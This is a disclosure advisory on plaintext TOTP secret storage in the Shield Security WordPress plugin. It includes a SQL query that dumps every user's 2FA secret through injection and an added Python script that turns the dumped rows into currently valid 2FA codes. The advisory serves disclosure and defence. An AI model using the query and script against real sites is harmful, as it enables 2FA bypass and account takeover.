| Affected plugin | Shield Security |
|---|---|
| Active installs | 60,000+ |
| Vulnerable version | <= 16.1.6 |
| Audited version | 16.1..1 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
Description
The plugin stores every user's TOTP secret in plaintext in the WordPress database (inside its own serialized record in `wp_usermeta`), with no encryption or hashing at rest.
Because the secret is the only thing needed to compute valid codes, an attacker who can exploit any one of the many read-only SQL injection vulnerabilities that keep appearing in WordPress plugins can dump all secrets in a single query and generate valid 2FA codes for every user, indefinitely, until each affected user re-enrolls with a new secret. No write access to the database is required.
Proof of concept
The following plugin code retrieves a user's TOTP secret from the plugin's meta record in the `wp_usermeta` table. `static::SLUG` is the string `"ga"`, so the property read is `ga_secret`; the value is used as-is, which is only possible because it is stored in the clear:

```php
protected function getSecret() {
    // Reads the plugin's own user-meta object and pulls the "ga_secret" property.
    // The returned value is the raw base32 TOTP seed, stored unencrypted.
    $secret = $this->getCon()->getUserMeta( $this->getUser() )->{static::SLUG.'_secret'};
    // Falls back to a class constant when no secret has been set for the user.
    return empty( $secret ) ? static::DEFAULT_SECRET : $secret;
}
```
Through a read-only SQL injection an attacker can obtain the TOTP secrets of all users with a single query:

```sql
SELECT user_id, meta_value FROM wp_usermeta WHERE meta_key = 'icwp-wpsf-meta'
```

Each returned `meta_value` is a serialized PHP array holding all of the plugin's meta data for one user. After deserializing a record with PHP's `unserialize()` (or any parser for the `serialize()` format), the `ga_secret` key contains that user's TOTP secret in plaintext, and `ga_validated` indicates whether the user has completed 2FA enrollment. A record for user 1 looks like this:

```
a:8:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:1;s:9:"pass_hash";s:4:"266b";s:5:"tours";a:2:{s:12:"dashboard_v1";i:1662922763;s:13:"navigation_v1";i:1662923128;}s:9:"ga_secret";s:16:"TJD7I4OXNQNPU3RD";s:12:"ga_validated";b:1;s:13:"login_intents";a:1:{s:10:"160ede8d07";a:2:{s:5:"start";i:1662982530;s:8:"attempts";i:0;}}s:9:"flash_msg";N;}
```

==> ga_secret: TJD7I4OXNQNPU3RD
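To show how little stands between the dumped rows and a working 2FA bypass, here is an added example (not part of the advisory or of the plugin) that parses the serialized `wp_usermeta` records into Python values, collects the `ga_secret` of every user, and derives a current code from it with standard RFC 6238 TOTP (HMAC-SHA1, 30-second step, 6 digits, which is what Google Authenticator-style secrets use). It assumes the rows are the `(user_id, meta_value)` pairs returned by the `SELECT` above; the only sample row embedded here is the record quoted in the advisory, so it runs offline.

```python
"""Turn dumped Shield Security user-meta rows into valid TOTP codes (added example)."""
import base64
import hashlib
import hmac
import struct
import time

# Constructed sample input: the serialized record shown in the advisory (user 1).
SAMPLE_RECORD = (
    'a:8:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:1;s:9:"pass_hash";'
    's:4:"266b";s:5:"tours";a:2:{s:12:"dashboard_v1";i:1662922763;'
    's:13:"navigation_v1";i:1662923128;}s:9:"ga_secret";s:16:"TJD7I4OXNQNPU3RD";'
    's:12:"ga_validated";b:1;s:13:"login_intents";a:1:{s:10:"160ede8d07";'
    'a:2:{s:5:"start";i:1662982530;s:8:"attempts";i:0;}}s:9:"flash_msg";N;}'
)


def php_unserialize(data: bytes):
    """Minimal parser for the PHP serialize() subset found in WordPress user meta:
    i (int), d (float), b (bool), N (null), s (byte string), a (array)."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError("trailing bytes after serialized value")
    return value


def _expect(data: bytes, pos: int, token: bytes) -> None:
    if data[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")


def _parse(data: bytes, pos: int):
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;
        _expect(data, pos + 1, b";")
        return None, pos + 2
    if tag in (b"i", b"d", b"b"):                     # i:123;  d:1.5;  b:1;
        end = data.index(b";", pos)
        raw = data[pos + 2:end].decode("ascii")
        val = int(raw) if tag == b"i" else float(raw) if tag == b"d" else raw == "1"
        return val, end + 1
    if tag == b"s":                                   # s:LEN:"bytes";  (LEN is a byte count)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        _expect(data, colon + 1, b'"')
        start = colon + 2
        _expect(data, start + length, b'";')
        return data[start:start + length].decode("utf-8"), start + length + 2
    if tag == b"a":                                   # a:COUNT:{key value ...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        _expect(data, colon + 1, b"{")
        pos = colon + 2
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            result[key] = val
        _expect(data, pos, b"}")
        return result, pos + 1
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")


def extract_totp_secrets(rows):
    """rows: iterable of (user_id, meta_value) as returned by the SQLi query.
    Returns {user_id: ga_secret} for every user that has a secret stored."""
    secrets = {}
    for user_id, meta_value in rows:
        meta = php_unserialize(meta_value.encode("utf-8"))
        secret = meta.get("ga_secret")
        if secret:  # ga_validated tells whether the user finished enrollment
            secrets[int(user_id)] = secret
    return secrets


def totp(secret_b32: str, unix_time: int, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 TOTP over HMAC-SHA1 for a base32-encoded seed such as ga_secret."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    counter = struct.pack(">Q", unix_time // step)
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


if __name__ == "__main__":
    rows = [(1, SAMPLE_RECORD)]  # in a real attack: the rows returned by the SELECT
    now = int(time.time())
    for uid, secret in extract_totp_secrets(rows).items():
        print(f"user {uid}: ga_secret={secret} current code={totp(secret, now)}")
```

The parser is deliberately a strict subset (no `O:` objects, so a malicious record cannot trigger object instantiation the way `unserialize()` on untrusted input can), and the code derivation uses only the standard library; the TOTP routine can be checked against the RFC 6238 test vectors (key `12345678901234567890`, T=59 gives `287082`).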
Timeline

| Vendor contacted | September 12, 2022 |
|---|---|
| First response | September 12, 2022 |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |